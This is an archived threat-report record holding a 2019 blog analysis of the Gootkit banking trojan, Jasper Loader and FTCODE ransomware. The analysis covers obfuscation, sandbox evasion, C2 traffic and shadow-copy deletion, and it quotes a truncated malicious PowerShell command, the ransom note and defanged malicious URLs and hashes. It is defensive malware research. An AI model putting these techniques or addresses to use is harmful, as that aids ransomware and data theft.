{
	"id": "99a40f72-4eb3-4c0e-b382-d95a05287cc5",
	"created_at": "2026-04-06T00:21:44.269463Z",
	"updated_at": "2026-04-10T13:11:56.508574Z",
	"deleted_at": null,
	"sha1_hash": "aa3334c5873edfa72f1878373ca8d0613de15c04",
	"title": "Nicht so goot - breaking down gootkit and jasper (+ ftcode)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2107466,
	"plain_text": "Nicht so goot - breaking down gootkit and jasper (+ ftcode)\r\nBy f0wL\r\nPublished: 2019-10-02 · Archived: 2026-04-05 23:42:42 UTC\r\nWed 02 October 2019 in Banking-Malware\r\nPun intended. Gootkit is one of the most spread banking malware at the moment and I deemed it a good\r\nopportunity to deobfuscate a bit of scrambled code\r\nA short disclaimer: downloading and running the samples linked below will compromise your computer and\r\ndata, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be\r\nillegal depending on where you live.\r\nGootkit Stage 3 Sample available @ Hybrid Analysis --\u003e\r\n3e846a7316dbc15a38cfd522b14ad3f1a72d79959cbae9fd14621400d77cbc37\r\nhttps://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html\r\nPage 1 of 10\n\nWith the obfuscated Javascript and VB Script samples I thought it would be a good idea to build a simple python\r\nscript to clean up the mess Jasper Loader left us. If I come across a newer version I'll update the script, other than\r\nthat Forks and PRs are always welcome as well.\r\nThe VB script as a first stage isn't really that sophisticated. Basically the 2947 lines of one ASCII character each\r\nrepresented as an integer with \"302\" added to it are each converted back to a char and added to the string fjuu\r\nwhich gets executed via WScript after the decoding is complete. The dumped command is once again a long\r\npowershell command with a base64 segment.\r\nhttps://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html\r\nPage 2 of 10\n\nThis PS snippet will download and display the weird online pet store order confirmation and the second stage of\r\nthe Jasper Loader (an obfuscated Javascript file).\r\nThe JS Stage includes a few unused variables, entangled functions and scrambled strings. These strings are then\r\nconcancated to one big string in an array which in turn is used in two replacement functions and then gets split.\r\nThe last step is a loop which calls the geejc function and selects every second character from the array to form the\r\nfinal powershell payload. The PS command contains a base64 encoded string which I decoded as a separate step\r\nin the script. Pretty easy so far...\r\nhttps://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html\r\nPage 3 of 10\n\nProbably the easiest way to identify a Jasper Loader is by looking at the characteristic conditional at the top of the\r\ndecoded base64 segment. First it checks the the localization of the UI for Systems from China, Romania, Russia,\r\nUkraine or Belarus and exits if this condition is true. Jasper will also quit if the WMI Computer_Model query\r\nreturns a string related to a VM Guest system for anti-analysis and sandbox evasion purposes.\r\nhttps://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html\r\nPage 4 of 10\n\nA Setup Information (.inf) file dropped by the PE payload.\r\nLooks like we've got some anti-analysis tricks with this binary as well...either way IDA Free does not really like it\r\nand complains about being unable to fetch the Imports 🤔 Scrambled Import Address Table anyone ? We'll take a\r\ncloser peak later\r\nAnother Version of the Gootkit/Jasper combo surfaced on September 26th when they swapped out the 3rd stage\r\npayload with FTCODE. Against the believe of some researchers this PowerShell based ransomware is not new\r\nand was first spotted in 2013 by Sophos Analysts as decribed in this article. The Link to the Any.Run Analysis of\r\nthe malicious Word Document can be found here.\r\nhttps://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html\r\nPage 5 of 10\n\nThe malicios macro in the Word document will download and execute the FTCODE PowerShell ransomware right\r\naway.\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" $atwsxvg = [string][System.Text.Encoding\r\nMaybe a reference to the developer/ group behind this attack? We won't know for sure, but the string \"BXCODE\r\nhack your system\" is present in all recent occurences of FTCODE.\r\nLadies and Gentlemen, this is the part of the code that gave today's ransomware it's name. It will append the\r\nextension .FTCODE to every encrypted file and drop a HTML ransomnote in the respective directories.\r\nAgain, this PS script also features the \"kill switch\"/ evasion technique found in Jasper.\r\nhttps://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html\r\nPage 6 of 10\n\nCommunication with the C\u0026C Server is accomplished via System.Net.Webclient and POST commands to the\nhardcoded address. In this case the victim ID (a UUID) and the generated encryption key are transmitted (in plain\ntext, a packet capture would get you the key and therefore your data back without paying the cyber-criminals :D ).\nLooks like FTCODE actually has a killswitch: A if a file called w00log03.tmp is present in %PUBLIC%\\OracleKit\nthe ransomware will create a new file called good_day.log and exit.\nAnother run-of-the-mill behaviour of ransomware these days is to disable the recovery mode, delete the system\nbackups and shadow copies. So nothing really new here either..\nFTCODE will encrypt all files with the follwing extensions:\n\"*.sql\",\"*.mp4\",\"*.7z\",\"*.rar\",\"*.m4a\",\"*.wma\",\"*.avi\",\"*.wmv\",\"*.csv\",\"*.d3dbsp\",\"*.zip\",\"*.sie\",\"*\nThe ransomnote, dropped as a HTML file with the filename READ_ME_NOW.htm\n\n# All your files was encrypted!\n\nYour personal ID: **$whyjfdxez**\n\nYour personal KEY: $gdejthseee\n\n1. Download Tor browser - [https://www.torproject.o 2. Install Tor browser https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html Page 7 of 10](https://www.torproject.org/download/)\n\n3. Open Tor Browser\n\n4. Open link in TOR browser: **http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.o**\n\n**5. Follow the instructions on this page**\n\n**## ***** Warning*****\n\nDo not rename files\n\nDo not try to back your data using third-party software, it may cause permanent data loss(If you d\n\nAs evidence, we can for free back one file\n\nDecoders of other users is not suitable to back your files - encryption key is created on your com\nTwitter user treetone alterted possible victims not to pay the ransom since he did not recieve a decryptor after\npaying the ransom for a client. Obviously there are different reports about the steps after paying the ransom as\nshown below.\nAs reported by BleepingComputer Forum User Hidemik paying the Ransom will redirect the victim to a page with\nthe instructions to run the following PowerShell Script (I removed the Base64 encoded RSA Key):\nhttps://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html\nPage 8 of 10**\n\nIOCs\r\nGootkit (SHA256)\r\n3e846a7316dbc15a38cfd522b14ad3f1a72d79959cbae9fd14621400d77cbc37\r\nMalicious .docm (SHA256)\r\nhttps://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html\r\nPage 9 of 10\n\nbf1fae0bca74eb3e788985734c750e33949e24f44f4c6e76c615aa70a80ea175\r\nRelated Files (SHA256)\r\n93aef539b491ecd4f3e3bfad2b226e8026d3335e457f5d8ba903e1d76686633e --\u003e feat-chewy-shipping-confirmation\r\n3721af6150db2082e6f8342c450070b835a46311c2fade9e1cd5598727d7db4f --\u003e index.js\r\ne6c58e32c151f2e9e44cd8bc98cdf12373a7f8fc40262e1c4402f2eb6d191d1e --\u003e invoice_confirmation_53467823886\r\nURLs\r\nhxxp://getpdfreader.13stripesbrewery[.]com/pdf.php?MTo7Njc2NDk3\r\nhxxp://rejoiner[.]com/resources/wp-content/uploads/2017/04/feat-chewy-shipping-confirmation.jpg\r\nhxxp://ont.carolinabeercompany[.]com/bolp.cab\r\nhxxp://wws.tkgventures[.]com/ (Source Port: 49207/ 50769, 194.76.224[.]108:80)\r\nhxxp://z2g3mtkwotm4[.]top/ (Source Port: 52742/ 52745, 35.187.36[.]248:80)\r\nhxxps://adp.reevesandcompany[.]com/rbody320 (176.10.125[.]87:443)\r\nhxxp://picturecrafting[.]site (208.91.197.91)\r\nhxxp://ogy5mtkwotm4[.]top\r\nhxxp://mjvjmtkwotm4[.]top\r\nhxxp://otnhmtkwotm4[.]top\r\nhxxp://zgzimtkwotm4[.]top\r\nhxxp://cofee.theshotboard[.]net/?need=uuid\u0026vid=dc1:loadjs\u0026\r\nhxxp://aweb.theshotboard[.]info/?page=xing\u0026vid=dc1:load\r\nhxxp://aweb.theshotboard[.]info/ver=926.3\u0026guid=VICTIM-ID+PASSWD\r\nhxxp://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd[.]onion/?guid=VICTIM-ID\r\nhxxp://home.tith[.]in/seven.sat\r\nhxxp://connect.simplebutmatters[.]com (185.158.248[.]151)\r\nhxxp://home.isdes[.]com (31.214.157[.]3)\r\nhxxp://home.southerntransitions[.]net (31.214.157[.]3)\r\nSource: https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html\r\nhttps://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html"
	],
	"report_names": [
		"nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434904,
	"ts_updated_at": 1775826716,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/aa3334c5873edfa72f1878373ca8d0613de15c04.pdf",
		"text": "https://archive.orkl.eu/aa3334c5873edfa72f1878373ca8d0613de15c04.txt",
		"img": "https://archive.orkl.eu/aa3334c5873edfa72f1878373ca8d0613de15c04.jpg"
	}
}